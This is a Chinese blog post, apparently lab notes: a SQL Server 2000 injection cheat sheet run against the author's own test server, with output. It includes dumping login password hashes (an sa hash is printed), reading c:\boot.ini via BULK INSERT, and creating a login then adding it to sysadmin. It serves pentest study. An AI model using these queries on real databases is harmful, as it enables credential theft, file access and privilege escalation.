mssql2000sp4 sql injection

最新推荐文章于 2023-09-19 22:17:18 发布
最新推荐文章于 2023-09-19 22:17:18 发布
阅读量849 收藏
点赞数
分类专栏: mssqlserver2000 SQL Injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9697901
版权

Version:

SELECT @@version;


Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Enterprise Evaluation Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


(所影响的行数为 1 行)

Comments: 

SELECT 1 --comment;

1

(所影响的行数为 1 行)

SELECT /*comment*/1;

1

(所影响的行数为 1 行)

Current User: 

SELECT user_name();

dbo

(所影响的行数为 1 行)

SELECT system_user;

YANG-C16322B843\Administrator

(所影响的行数为 1 行)

SELECT user;

dbo

(所影响的行数为 1 行)

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID;

loginame                                                                                                                         
-------------------------------------------------------------------------------------------------------------------------------- 
YANG-C16322B843\Administrator                                                                                                   

(所影响的行数为 1 行)

List Users: 

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa
BUILTIN\Administrators

(所影响的行数为 2 行)

List Password Hashes:

SELECT name, password FROM master..sysxlogins;

name                                                                                                                             password                                                                                                                                                                                                                                                           
-------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 
BUILTIN\Administrators                                                                                                           NULL
sa                                                                                                                               0x01008857077DB8818A4AF0ECF49EDA773D7C136CEB10769829D1478CAC0BE3631231BA55BD40D38AFD5E7E4F608B
NULL                                                                                                                             NULL

(所影响的行数为 3 行)

SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins;

name                                                                                                                                                                                                                                                                                                                                                                                              
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators                                                                                                           NULL
sa                                                                                                                               0x01008857077db8818a4af0ecf49eda773d7c136ceb10769829d1478cac0be3631231ba55bd40d38afd5e7e4f608b
NULL                                                                                                                             NULL

(所影响的行数为 3 行)

List Privileges: 

SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)


SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators
sa

(所影响的行数为 2 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators
sa

(所影响的行数为 2 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa

(所影响的行数为 1 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa

(所影响的行数为 1 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators
sa

(所影响的行数为 2 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

Current Database:

SELECT DB_NAME();


                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
master

(所影响的行数为 1 行)

List Databases: 

SELECT name FROM master..sysdatabases;

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
master
tempdb
model
msdb
pubs
Northwind
yang

(所影响的行数为 7 行)


SELECT DB_NAME(0); 
SELECT DB_NAME(1); 
SELECT DB_NAME(2); 
SELECT DB_NAME(3); 
SELECT DB_NAME(4); 
SELECT DB_NAME(5); 
SELECT DB_NAME(6); 
SELECT DB_NAME(7); 
SELECT DB_NAME(8); 

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
master

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
master

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
tempdb

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
model

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
msdb

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
pubs

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
Northwind

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
yang

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
NULL

(所影响的行数为 1 行)

List Columns: 

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tb_user'); 

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
password
username

(所影响的行数为 2 行)


SELECT yang..syscolumns.name, TYPE_NAME(yang..syscolumns.xtype) FROM yang..syscolumns, yang..sysobjects WHERE yang..syscolumns.id=yang..sysobjects.id AND yang..sysobjects.name='tb_user';

name                                                                                                                                                                                                                                                              
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- 
username                                                                                                                         varchar
password                                                                                                                         varchar

(所影响的行数为 2 行)

List Tables: 

SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM yang..sysobjects WHERE xtype = 'U';

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
spt_monitor
spt_values
spt_fallback_db
spt_fallback_dev
spt_fallback_usg
spt_provider_types
spt_datatype_info_ext
MSreplication_options
spt_datatype_info
spt_server_info

(所影响的行数为 10 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
tb_user
dtproperties

(所影响的行数为 2 行)

Find Tables From Column Name: 

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name = 'username';

tablename                                                                                                                        columnname                                                                                                                       
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- 
tb_user                                                                                                                          username

(所影响的行数为 1 行)

Select Nth Row: 

SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC;

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa

(所影响的行数为 1 行)

Select Nth Char: 

SELECT substring('abcd', 3, 1);

     
---- 
c

(所影响的行数为 1 行)

Bitwise AND: 

SELECT 6 & 2;
SELECT 6 & 1;

            
----------- 
2

(所影响的行数为 1 行)

            
----------- 
0

(所影响的行数为 1 行)

ASCII Value -> Char: 

SELECT char(0x41);

     
---- 
A

(所影响的行数为 1 行)

Char -> ASCII Value: 

SELECT ascii('A');

            
----------- 
65

(所影响的行数为 1 行)

Casting: 

SELECT CAST('1' as int);
SELECT CAST(1 as char);

            
----------- 
1

(所影响的行数为 1 行)

                               
------------------------------ 
1                             

(所影响的行数为 1 行)

String Concatenation: 

SELECT 'A' + 'B';

     
---- 
AB

(所影响的行数为 1 行)

If Statement: 

IF (1=1) SELECT 1 ELSE SELECT 2;

            
----------- 
1

(所影响的行数为 1 行)

Case Statement: 

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END;

            
----------- 
1

(所影响的行数为 1 行)

Avoiding Quotes: 

SELECT char(65)+char(66);

     
---- 
AB

(所影响的行数为 1 行)

Time Delay:

WAITFOR DELAY '0:0:5';

Local File Access:

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\\boot.ini';
SELECT * FROM mydata;

(所影响的行数为 5 行)

line                                                                                                                                                                                                                                                             
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect

(所影响的行数为 5 行)

Hostname, IP Address: 

SELECT HOST_NAME();

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
YANG-C16322B843

(所影响的行数为 1 行)

Create Users: 

EXEC sp_addlogin 'user', 'pass'; 

已创建新登录。

Make User DBA: 

EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; 

'user' 已添加到角色 'sysadmin' 中。

Drop Users: 

EXEC sp_droplogin 'user'; 

登录已除去。

Location of DB files: 

EXEC sp_helpdb master;
EXEC sp_helpdb pubs;

name                                                                                                                             db_size       owner                                                                                                                            dbid   created     status                                                                                                                                                                                                                                                           compatibility_level 
-------------------------------------------------------------------------------------------------------------------------------- ------------- -------------------------------------------------------------------------------------------------------------------------------- ------ ----------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------- 
master                                                                                                                                22.00 MB sa                                                                                                                               1      08  6 2000  Status=ONLINE, Updateability=READ_WRITE, UserAccess=MULTI_USER, Recovery=SIMPLE, Version=539, Collation=Chinese_PRC_CI_AS, SQLSortOrder=0, IsTornPageDetectionEnabled, IsAutoCreateStatistics, IsAutoUpdateStatistics                                            80

 
name                                                                                                                             fileid filename                                                                                                                                                                                                                                                         filegroup                                                                                                                        size               maxsize            growth             usage     
-------------------------------------------------------------------------------------------------------------------------------- ------ ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ------------------ ------------------ ------------------ --------- 
master                                                                                                                           1      C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf                                                                                                                                                                                                      PRIMARY                                                                                                                          17344 KB           Unlimited          10%                data only
mastlog                                                                                                                          2      C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf                                                                                                                                                                                                     NULL                                                                                                                             5184 KB            Unlimited          10%                log only

name                                                                                                                             db_size       owner                                                                                                                            dbid   created     status                                                                                                                                                                                                                                                           compatibility_level 
-------------------------------------------------------------------------------------------------------------------------------- ------------- -------------------------------------------------------------------------------------------------------------------------------- ------ ----------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------- 
pubs                                                                                                                                   2.50 MB sa                                                                                                                               5      08  6 2000  Status=ONLINE, Updateability=READ_WRITE, UserAccess=MULTI_USER, Recovery=SIMPLE, Version=539, Collation=Chinese_PRC_CI_AS, SQLSortOrder=0, IsTornPageDetectionEnabled, IsAutoCreateStatistics, IsAutoUpdateStatistics                                            80

 
name                                                                                                                             fileid filename                                                                                                                                                                                                                                                         filegroup                                                                                                                        size               maxsize            growth             usage     
-------------------------------------------------------------------------------------------------------------------------------- ------ ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ------------------ ------------------ ------------------ --------- 
pubs                                                                                                                             1      C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf                                                                                                                                                                                                        PRIMARY                                                                                                                          1792 KB            Unlimited          10%                data only
pubs_log                                                                                                                         2      C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf                                                                                                                                                                                                    NULL                                                                                                                             768 KB             Unlimited          10%                log only


feier7501
关注
专栏目录
SQL2000SP4
01-26
SQL Server 2000 Service Pack 4 (SP4) 是微软发布的一个重要更新,用于增强其数据库管理系统SQL Server 2000的功能和安全性。这个服务包包含了自SQL Server 2000初始版本以来的所有累积性更新、补丁和安全修复,...
sql2000sp4bd_downcc.zip
02-23
标题 "sql2000sp4bd_downcc.zip" 暗示了这是一个与Microsoft SQL Server 2000 Service Pack 4相关的压缩文件。SQL Server 2000是微软公司推出的一款关系型数据库管理系统(RDBMS),在当时广泛应用于企业和组织的...
sql2000安装sp4补丁包教程_sql2000sp4
smddw的博客
05-28 758
在安装SP4补丁之前,您要先确定SQL2000是否安装成功,如果没有,请查看如何安装SQL2000全程图解第1步:解压sql2ksp4.rar这个压缩包到当前路径,点击setup.bat进行安装,如下图:第2步:点击"下一步",如下图:第3步:点击"是",如下图:第4步:继续点击"是",如下图:第...
微软SQL2000+SP4集成安装版 v3.9 BY 少轻狂 [支持WIN11]
最新发布
flighty的专栏
09-19 5150
搜索现在的互联网,轻狂还未发现真正能够实现一键安装 SQL2000 和SP4的集成包,大多都是用批处理安装 SQL2000 后再手动安装 SP4 补丁,为了节省部署的时间和精力,让我们能够在有限的生命中做更多的事情,轻狂决定做一个这样的安装包。1、企业管理器-控制台根目录-Microsoft SQL Server-SQL Server 组-LOCAL(也可能是你的计算机名称)-安全性-登录,双击右侧的 sa,填写密码并确认密码。判断目标操作系统,自动勾选对应的版本(开发版或企业版);
mysql2000 sp4_【sql2000 sp4补丁下载】sql2000 sp4补丁64位下载 官方版-七喜软件园
weixin_39943750的博客
01-30 1341
sql2000 sp4补丁是一款专门为sql2000打造的软件补丁工具,它能够帮助用户加固程序,修复数据库的漏洞,为你提供更加流畅稳定的使用体验。此外,sql2000 sp4补丁官方版还有着丰富的组件工具,为你拓展更多的使用功能。sql2000 sp4补丁64位版使用方法简单方便,并且还能兼容多个版本的系统,有需要的朋友们,赶紧下载吧。sql2000 sp4补丁特色Microsoft 在SQL20...
安装Server2003+SQL2000+SQL2000SP4
leejianjun的博客
02-22 621
1、server2003下载地址(下载64位的) http://blog.sina.com.cn/s/blog_6edc18a10101cpfl.html 提供一个可用的SN:BTR9T-8BJJM-K9DH8-W8GRH-7QBQY 2、SQL2000下载地址(下载的文件名为sqleval,你没有看错) http://www.xiazaiba.com/html/4102.html
关于sql sp4补丁
shiyonghua的专栏
04-28 1417
<br />你好,我新买的HP DL585 G7 服务器,服务器环境为(AMD 6174 32核处理器,64内存)装不上sql sp4补丁 。装到“安装程序正在为升级进程对服务器进行初始化” 进行不下去了,过大概15分钟左右出现错误对话框“由于MSSQLSERVER” 服务,服务控制操作失败1460,由于超时时间已过,该操作返回”  点确定又弹出窗口“启动服务以建立系统目录时出错误”
SQLSERVER2000SP4新特性概述
zgqtxwd的专栏
04-28 365
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
64位系统安装SQL2000SP4详细教程[已测试WIN72008R2]
weixin_33713707的博客
10-29 2214
方法1:解压后得到下面文件夹 PERSONAL 进入下面的目录,运行红箭头的那个文件,不需要以管理员身份运行。运行后打开对话框,选择红箭头文件点击打开。一路安装会有2个错误提示无视即可。可能会提示兼容性问题无视确定。解压SP4补丁,进入下面目录,运行红箭头所指文件,不需要以管理员身份运行。安装完毕后,点击开始-程序-启动,启动服务管理器并运行,然后记得看好是否自动启动打上勾...
sql server 2000 版本及sp4补丁说明
liujinye的专栏
05-10 3246
1、版本: 在查询分析器里查询 select @@version This will have a number which wil correspond to: 6.00.121 v6.0 6.00.124 v6.0 SP1  6.00.139 v6.0 SP2  6.00.151 v6.0 SP3  6.50.201 v6.5 6.50.213 v6.
MSDE 2000 & SQL SP4补丁
似水无痕
06-16 2693
http://www.microsoft.com/downloads/zh-cn/details.aspx?displaylang=zh-cn&FamilyID=8e2dfc8d-c20e-4446-99a9-b7f0213f8bc5 http://www.microsoft.com/downloads/zh-cn/details.aspx?familyid=413744D1-A0BC-479F-
sql2000sp4
01-21
SP4 包括用于以下 SQL Server 2000 组件的程序包: Database 组件(下载1:SQL2000-KB884525-SP4-x86.EXE)更新 SQL Server 2000 的 32 位 Database 组件 ,包括数据库引擎、复制、客户端连接组件及工具。
SQL2000SP4补丁
08-23
SQL Server 2000 Service Pack 4 (SP4) 是微软为该数据库管理系统发布的一个重要更新,旨在增强系统的稳定性和安全性。SQL Server 2000 是一款广泛使用的数据库平台,尤其在2000年代初期,它为企业级数据管理和分析...
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
天元喜羊羊的博客
07-07 1587
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。 原来的博客链接:http://blog.csdn.net/feier7501/article/details/9220495 import socket HOST = '' PORT = 4444 s = socket.socket(socket.AF_INET, socket
SQL Injector - POST Parameter Attack
天元喜羊羊的博客
07-08 1339
login.jsp如下: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> Register user username: password: bt5上操作如下: root@bt:/pentest/exploits/fasttrack
Oracle sql injection
天元喜羊羊的博客
07-31 1278
先创建一个普通用户并授权: C:\>sqlplus "/as sysdba" SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 7月 31 21:49:45 2013 Copyright (c) 1982, 2005, Oracle. All rights reserved. 连接到: Personal Oracle Database 1
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
天元喜羊羊的博客
07-08 1120
fasttrack操作: root@bt:~# cd /pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks...
MSSQL2K - SQL Injector - Query String Parameter Attack
天元喜羊羊的博客
07-01 1083
操作如下: root@root:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks... ******* ************************************
QC9.0与SQL2000SP4安装教程
本资源是一份详细的安装教程,指导用户如何在Windows环境下安装QualityCenter 9.0(简称QC9.0)以及配套的SQLServer 2000 SP4。安装过程中需要注意的要点包括SQLServer 2000的安装与补丁应用,以及QC9.0的license...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值